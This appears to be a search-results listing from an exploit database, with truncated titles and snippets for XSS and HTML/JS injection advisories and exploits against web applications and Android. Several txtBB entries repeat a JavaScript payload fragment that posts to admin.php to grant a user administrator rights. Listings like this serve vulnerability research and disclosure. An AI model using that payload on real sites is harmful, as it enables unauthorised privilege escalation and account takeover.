58 matches found
FormGet Contact Form 5.3 - Stored XSS
The AJAX action ‘requestresponse’, defined in formget-contact-form/index.php line 278 is available to any logged in user. The parameter ‘value’ is accepted as valid, so long as the string ‘sideBar’ is found at a position other than 0 i.e. prefix the payload with a space. The ‘pageid’ parameter ca...
WeBid 1.0.2 persistent XSS via SQL Injection
No description provided by source. Exploit Title: presistent XSS through SQLi WeBid 1.0.2 Google Dork: powered by WeBid Date: 15-06-2011 Author: Saif El-Sherei Software Link: http://sourceforge.net/projects/simpleauction/ Version: 1.0.2 Tested on: Firefox 4, XAMPP Info: Open source php/mysql full...
Alt-N MDaemon 13.0.3 and 12.5.6 Email Body HTML/JS Injection Vulnerability
No description provided by source. ============================================================== Alt-N MDaemon Email Body HTML/JS Injection Vulnerability ============================================================== Software: Alt-N MDaemon v13.0.3 and prior versions Vendor: http://www.altn.com/...
Android Browser and WebView addJavascriptInterface Code Execution
This Metasploit module exploits a privilege escalation issue in Android versions prior 4.2's WebView component that arises when untrusted Javascript code is executed by a WebView that has one or more Interfaces added to it. The untrusted Javascript code can call into the Java Reflection APIs...
Alt-N MDaemon Email Body HTML/JS Injection Vulnerability
============================================================== Alt-N MDaemon Email Body HTML/JS Injection Vulnerability ============================================================== Software: Alt-N MDaemon v13.0.3 and prior versions Vendor: http://www.altn.com/ Vuln Type: HTML/JS Injection Remot...
Alt-N MDaemon Email Body Cross Site Scripting
============================================================== Alt-N MDaemon Email Body HTML/JS Injection Vulnerability ============================================================== Software: Alt-N MDaemon v13.0.3 and prior versions Vendor: http://www.altn.com/ Vuln Type: HTML/JS Injection Remot...
Alt-N MDaemon 12.5.613.0.3 - Email Body HTMLJS Injection
Alt-N MDaemon 12.5.613.0.3 - Email Body HTMLJS Injection ============================================================== Alt-N MDaemon Email Body HTML/JS Injection Vulnerability ============================================================== Software: Alt-N MDaemon v13.0.3 and prior versions Vendor...
Alt-N MDaemon 12.5.6/13.0.3 - Email Body HTML/JS Injection
============================================================== Alt-N MDaemon Email Body HTML/JS Injection Vulnerability ============================================================== Software: Alt-N MDaemon v13.0.3 and prior versions Vendor: http://www.altn.com/ Vuln Type: HTML/JS Injection Remot...
Google Android - 'content://' URI Multiple Information Disclosure Vulnerabilities
Android Data Stealing Web PageClick: Malicious Link"; // Stage 1: Redirect to Stage 2 which will force a download of the HTML/JS payload, then a few seconds later redirect...
OCS Inventory NG 2.0.1 Persistent XSS
Exploit for windows platform in category web applications OCS Inventory NG 2.0.1 - Persistent XSS CVE-2011-4024 ------------------------------------------------------- Software : Open Computer and Software OCS Inventory NG Download : http://www.ocsinventory-ng.org/ Discovered by : Nicolas DEROUET...
WeBid 1.0.2 - Persistent Cross-Site Scripting (via SQL Injection)
WeBid 1.0.2 - Persistent Cross-Site Scripting via SQL Injection Exploit Title: presistent XSS through SQLi WeBid 1.0.2 Google Dork: "powered by WeBid" Date: 15-06-2011 Author: Saif El-Sherei Software Link: http://sourceforge.net/projects/simpleauction/ Version: 1.0.2 Tested on: Firefox 4, XAMPP...
Joomla! Component Restaurant Guide 1.0.0 - Multiple Vulnerabilities
Joomla! Component Restaurant Guide 1.0.0 - Multiple Vulnerabilities Exploit Title: Joomla Component comrestaurantguide Multiple Vulnerabilities Date: 18.09.2010 Author: Valentin Category: webapps/0day Version: 1.0.0 Tested on: Debian lenny, Apache2, MySQL 5, Joomla 1.5.x CVE : Code :...
txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit
No description provided by source. !-- txtBB = 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit By cOndemned Greetz: ZaBeaTy, sid.psycho, Alfons Luja, vCore, irk4z & str0ke ; Exploitation: 1. Create an account 2. Go to http://host/txtbb10RC3path/index.php?type=account 3. Put exploit code...
txtBB 1.0 RC3 - HTMLJS Injection Arbitrary Add Admin Privileges
txtBB 1.0 RC3 - HTMLJS Injection Arbitrary Add Admin Privileges var req = new XMLHttpRequest; req.open'POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false; req.setRequestHeader'Content-Type', 'application/x-www-form-urlencoded';...
txtBB 1.0 RC3 Injection
var req = new XMLHttpRequest; req.open'POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false; req.setRequestHeader'Content-Type', 'application/x-www-form-urlencoded'; req.send'signature=&avatar=&type=3&password=&submit=Zapisz';...
txtBB 1.0 RC3 - HTML/JS Injection / Arbitrary Add Admin Privileges
var req = new XMLHttpRequest; req.open'POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false; req.setRequestHeader'Content-Type', 'application/x-www-form-urlencoded'; req.send'signature=&avatar=&type=3&password=&submit=Zapisz'; milw0rm.com 2009-02-05...
txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit
Exploit for unknown platform in category web applications ================================================================= txtBB var req = new XMLHttpRequest; req.open'POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false; req.setRequestHeader'Content-Type',...
[Full-disclosure] SF-Shoutbox 1.2.1 <= 1.4 HTML/JS Injection Vulnerability
----------------------------- || WWW.SMASH-THE-STACK.NET || ----------------------------- || ADVISORY: SF-Shoutbox 1.2.1 = 1.4 HTML/JS Injection Vulnerability || 0x00: ABOUT ME || 0x01: DATELINE || 0x02: INFORMATION || 0x03: EXPLOITATION || 0x04: GOOGLE DORK || 0x05: RISK LEVEL || 0x00: ABOUT ME...